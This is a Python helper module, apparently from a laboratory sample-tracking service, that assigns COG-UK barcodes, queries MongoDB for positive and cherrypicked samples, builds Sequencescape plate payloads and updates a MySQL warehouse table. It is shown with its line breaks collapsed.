import copy import logging from http import HTTPStatus from typing import Any, Dict, List, Optional import requests from flask import current_app as app from lighthouse.constants import ( FIELD_COG_BARCODE, FIELD_COORDINATE, FIELD_DART_CONTROL, FIELD_DART_DESTINATION_BARCODE, FIELD_DART_DESTINATION_COORDINATE, FIELD_DART_LAB_ID, FIELD_DART_RNA_ID, FIELD_DART_ROOT_SAMPLE_ID, FIELD_DART_SOURCE_BARCODE, FIELD_DART_SOURCE_COORDINATE, FIELD_LAB_ID, FIELD_PLATE_BARCODE, FIELD_RESULT, FIELD_RNA_ID, FIELD_ROOT_SAMPLE_ID, FIELD_SOURCE, POSITIVE_SAMPLES_MONGODB_FILTER, STAGE_MATCH_POSITIVE, ) from lighthouse.exceptions import ( DataError, MissingCentreError, MissingSourceError, MultipleCentresError, ) from lighthouse.helpers.dart_db import find_dart_source_samples_rows from lighthouse.helpers.mysql_db import create_mysql_connection_engine, get_table from sqlalchemy.sql.expression import and_ # type: ignore from sqlalchemy.sql.expression import bindparam # type: ignore logger = logging.getLogger(__name__) class UnmatchedSampleError(Exception): pass def add_cog_barcodes(samples: List[Dict[str, str]]) -> Optional[str]: centre_name = confirm_centre(samples) centre_prefix = get_centre_prefix(centre_name) num_samples = len(samples) logger.info(f"Getting COG-UK barcodes for {num_samples} samples") baracoda_url = ( f"http://{app.config['BARACODA_URL']}" f"/barcodes_group/{centre_prefix}/new?count={num_samples}" ) retries = app.config["BARACODA_RETRY_ATTEMPTS"] success_operation = False except_obj = None while retries > 0: try: response = requests.post(baracoda_url) if response.status_code == HTTPStatus.CREATED: success_operation = True retries = 0 barcodes = response.json()["barcodes_group"]["barcodes"] for (sample, barcode) in zip(samples, barcodes): sample[FIELD_COG_BARCODE] = barcode else: retries = retries - 1 logger.error("Unable to create COG barcodes") logger.error(response.json()) except_obj = Exception("Unable to create COG barcodes") except requests.ConnectionError: retries = retries - 1 logger.error("Unable to access baracoda") except_obj = requests.ConnectionError("Unable to access baracoda") if not success_operation and except_obj is not None: raise except_obj # return centre prefix # TODO: I didn't know how else to get centre prefix? return centre_prefix def get_centre_prefix(centre_name: str) -> Optional[str]: logger.debug(f"Getting the prefix for '{centre_name}'") try: #  get the centre collection centres = app.data.driver.db.centres # use a case insensitive search for the centre name filter = {"name": {"$regex": f"^(?i){centre_name}$"}} assert centres.count_documents(filter) == 1 centre = centres.find_one(filter) prefix = centre["prefix"] logger.debug(f"Prefix for '{centre_name}' is '{prefix}'") return prefix except Exception as e: logger.exception(e) return None except AssertionError as e: logger.exception(e) raise DataError("Multiple centres with the same name") def find_samples(query: Dict[str, Any]) -> Optional[List[Dict[str, Any]]]: if query is None: return None samples = app.data.driver.db.samples samples_for_barcode = list(samples.find(query)) logger.info(f"Found {len(samples_for_barcode)} samples") return samples_for_barcode def count_samples(query: Dict[str, Any]) -> int: samples = app.data.driver.db.samples return samples.count_documents(query) # TODO: remove once we are sure that we dont need anything other than positives def get_samples(plate_barcode: str) -> Optional[List[Dict[str, Any]]]: samples_for_barcode = find_samples({FIELD_PLATE_BARCODE: plate_barcode}) return samples_for_barcode def get_positive_samples(plate_barcode: str) -> Optional[List[Dict[str, Any]]]: """Get a list of documents which correspond to filtered positive samples for a specific plate. Args: plate_barcode (str): the barcode of the plate to get samples for. Returns: Optional[List[Dict[str, Any]]]: the list of samples for this plate. """ samples_collection = app.data.driver.db.samples # The pipeline defines stages which execute in sequence pipeline = [ # 1. We are only interested in the samples for a particular plate {"$match": {FIELD_PLATE_BARCODE: plate_barcode}}, # 2. Then run the positive match stage STAGE_MATCH_POSITIVE, ] samples_for_barcode = list(samples_collection.aggregate(pipeline)) logger.info(f"Found {len(samples_for_barcode)} samples") return samples_for_barcode def count_positive_samples(plate_barcode: str) -> int: query_filter = copy.deepcopy(POSITIVE_SAMPLES_MONGODB_FILTER) query_filter[FIELD_PLATE_BARCODE] = plate_barcode samples_for_barcode = count_samples(query_filter) return samples_for_barcode def has_sample_data(plate_barcode: str) -> bool: sample_count = count_samples({FIELD_PLATE_BARCODE: plate_barcode}) return sample_count > 0 def row_is_normal_sample(row): control_value = getattr(row, FIELD_DART_CONTROL) return control_value is None or control_value == "NULL" or control_value == "" def rows_without_controls(rows): list = [] for row in rows: if row_is_normal_sample(row): list.append(row) return list def rows_with_controls(rows): list = [] for row in rows: if not row_is_normal_sample(row): list.append(row) return list def query_for_cherrypicked_samples(rows): if rows is None or (len(rows) == 0): return None mongo_query = [] for row in rows_without_controls(rows): sample_query = { FIELD_ROOT_SAMPLE_ID: getattr(row, FIELD_DART_ROOT_SAMPLE_ID), FIELD_RNA_ID: getattr(row, FIELD_DART_RNA_ID), FIELD_LAB_ID: getattr(row, FIELD_DART_LAB_ID), } mongo_query.append(sample_query) return {"$or": mongo_query} def equal_row_and_sample(row, sample): return ( (sample[FIELD_ROOT_SAMPLE_ID] == getattr(row, FIELD_DART_ROOT_SAMPLE_ID)) and (sample[FIELD_RNA_ID] == getattr(row, FIELD_DART_RNA_ID)) and (sample[FIELD_LAB_ID] == getattr(row, FIELD_DART_LAB_ID)) ) def find_sample_matching_row(row, samples): for pos in range(0, len(samples)): sample = samples[pos] if equal_row_and_sample(row, sample): return sample return None def join_rows_with_samples(rows, samples): records = [] for row in rows_without_controls(rows): records.append({"row": row_to_dict(row), "sample": find_sample_matching_row(row, samples)}) return records def add_controls_to_samples(rows, samples): control_samples = [] for row in rows_with_controls(rows): control_samples.append({"row": row_to_dict(row), "sample": None}) return samples + control_samples def check_matching_sample_numbers(rows, samples): if len(samples) != len(rows_without_controls(rows)): msg = ( "Mismatch in data present for destination plate: number of samples in DART and Mongo " "does not match" ) logger.error(msg) raise UnmatchedSampleError(msg) def row_to_dict(row): columns = [ FIELD_DART_DESTINATION_BARCODE, FIELD_DART_DESTINATION_COORDINATE, FIELD_DART_SOURCE_BARCODE, FIELD_DART_SOURCE_COORDINATE, FIELD_DART_CONTROL, FIELD_DART_ROOT_SAMPLE_ID, FIELD_DART_RNA_ID, FIELD_DART_LAB_ID, ] obj = {} for column in columns: obj[column] = getattr(row, column) return obj def get_cherrypicked_samples_records(barcode): rows = find_dart_source_samples_rows(barcode) samples = find_samples(query_for_cherrypicked_samples(rows)) return join_rows_with_samples(rows, samples) def confirm_centre(samples: List[Dict[str, str]]) -> str: """Confirm that the centre for all the samples is populated and the same and return the centre name Arguments: samples {List} -- the list of samples to check Returns: str -- the name of the centre for these samples """ logger.debug("confirm_centre()") try: # check that the 'source' field has a valid name for sample in samples: if not sample[FIELD_SOURCE]: raise MissingCentreError(sample) # create a set from the 'source' field to check we only have 1 unique centre for these # samples centre_set = {sample[FIELD_SOURCE] for sample in samples} except KeyError: raise MissingSourceError() else: if len(centre_set) > 1: raise MultipleCentresError() return centre_set.pop() def create_post_body(barcode: str, samples: List[Dict[str, str]]) -> Dict[str, Any]: logger.debug(f"Creating POST body to send to SS for barcode '{barcode}'") wells_content = {} for sample in samples: for key, value in sample.items(): if key.strip() == FIELD_RESULT: phenotype = value if key.strip() == FIELD_ROOT_SAMPLE_ID: description = value assert phenotype is not None assert sample[FIELD_COG_BARCODE] is not None well = { "content": { "phenotype": phenotype.strip().lower(), "supplier_name": sample[FIELD_COG_BARCODE], "sample_description": description, } } wells_content[sample[FIELD_COORDINATE]] = well body = { "barcode": barcode, "purpose_uuid": app.config["SS_UUID_PLATE_PURPOSE"], "study_uuid": app.config["SS_UUID_STUDY"], "wells": wells_content, } return {"data": {"type": "plates", "attributes": body}} def send_to_ss(body: Dict[str, Any]) -> requests.Response: ss_url = f"http://{app.config['SS_HOST']}/api/v2/heron/plates" logger.info(f"Sending {body} to {ss_url}") headers = {"X-Sequencescape-Client-Id": app.config["SS_API_KEY"]} try: response = requests.post(ss_url, json=body, headers=headers) logger.debug(response.status_code) except requests.ConnectionError: raise requests.ConnectionError("Unable to access SS") return response def update_mlwh_with_cog_uk_ids(samples: List[Dict[str, str]]) -> None: """Update the MLWH to write the COG UK barcode for each sample. Arguments: samples {List[Dict[str, str]]} -- list of samples to be updated """ if len(samples) == 0: return None # assign db_connection to avoid UnboundLocalError in 'finally' block, in case of exception db_connection = None try: data = [] for sample in samples: # using 'b_' prefix for the keys because bindparam() doesn't allow you to use the real # column names data.append( { "b_root_sample_id": sample[FIELD_ROOT_SAMPLE_ID], "b_rna_id": sample[FIELD_RNA_ID], "b_result": sample[FIELD_RESULT], "b_cog_uk_id": sample[FIELD_COG_BARCODE], } ) sql_engine = create_mysql_connection_engine( app.config["WAREHOUSES_RW_CONN_STRING"], app.config["ML_WH_DB"] ) table = get_table(sql_engine, app.config["MLWH_LIGHTHOUSE_SAMPLE_TABLE"]) stmt = ( table.update() .where( and_( table.c.root_sample_id == bindparam("b_root_sample_id"), table.c.rna_id == bindparam("b_rna_id"), table.c.result == bindparam("b_result"), ) ) .values(cog_uk_id=bindparam("b_cog_uk_id")) ) db_connection = sql_engine.connect() results = db_connection.execute(stmt, data) rows_matched = results.rowcount if rows_matched != len(samples): msg = f""" Updating MLWH {app.config['MLWH_LIGHTHOUSE_SAMPLE_TABLE']} table with COG UK ids was only partially successful. Only {rows_matched} of the {len(samples)} samples had matches in the MLWH {app.config['MLWH_LIGHTHOUSE_SAMPLE_TABLE']} table. """ logger.error(msg) raise UnmatchedSampleError(msg) except (Exception) as e: msg = f""" Error while updating MLWH {app.config['MLWH_LIGHTHOUSE_SAMPLE_TABLE']} table with COG UK ids. {type(e).__name__}: {str(e)} """ logger.error(msg) raise finally: if db_connection is not None: db_connection.close() def map_to_ss_columns(samples: List[Dict[str, Any]]) -> List[Dict[str, Any]]: mapped_samples = [] for sample in samples: mapped_sample = {} # type: Dict[str, Any] mongo_row = sample["sample"] dart_row = sample["row"] try: if dart_row[FIELD_DART_CONTROL]: mapped_sample["control"] = True mapped_sample["control_type"] = dart_row[FIELD_DART_CONTROL] else: mapped_sample["name"] = mongo_row[FIELD_RNA_ID] mapped_sample["sample_description"] = mongo_row[FIELD_ROOT_SAMPLE_ID] mapped_sample["supplier_name"] = mongo_row[FIELD_COG_BARCODE] mapped_sample["phenotype"] = "positive" mapped_sample["coordinate"] = dart_row[FIELD_DART_DESTINATION_COORDINATE] mapped_sample["barcode"] = dart_row[FIELD_DART_DESTINATION_BARCODE] except KeyError as e: msg = f""" Error while mapping database columns to Sequencescape columns for sample {mongo_row[FIELD_ROOT_SAMPLE_ID]}. {type(e).__name__}: {str(e)} """ logger.error(msg) raise mapped_samples.append(mapped_sample) return mapped_samples def create_cherrypicked_post_body(barcode: str, samples: List[Dict[str, Any]]) -> Dict[str, Any]: logger.debug( f"Creating POST body to send to SS for cherrypicked plate with barcode '{barcode}'" ) wells_content = {} for sample in samples: content = {} if "control" in sample: content["control"] = sample["control"] content["control_type"] = sample["control_type"] else: content["name"] = sample["name"] content["phenotype"] = sample["phenotype"] content["supplier_name"] = sample["supplier_name"] content["sample_description"] = sample["sample_description"] wells_content[sample["coordinate"]] = {"content": content} body = { "barcode": barcode, "purpose_uuid": app.config["SS_UUID_PLATE_PURPOSE_CHERRYPICKED"], "study_uuid": app.config["SS_UUID_STUDY_CHERRYPICKED"], "wells": wells_content, } return {"data": {"type": "plates", "attributes": body}}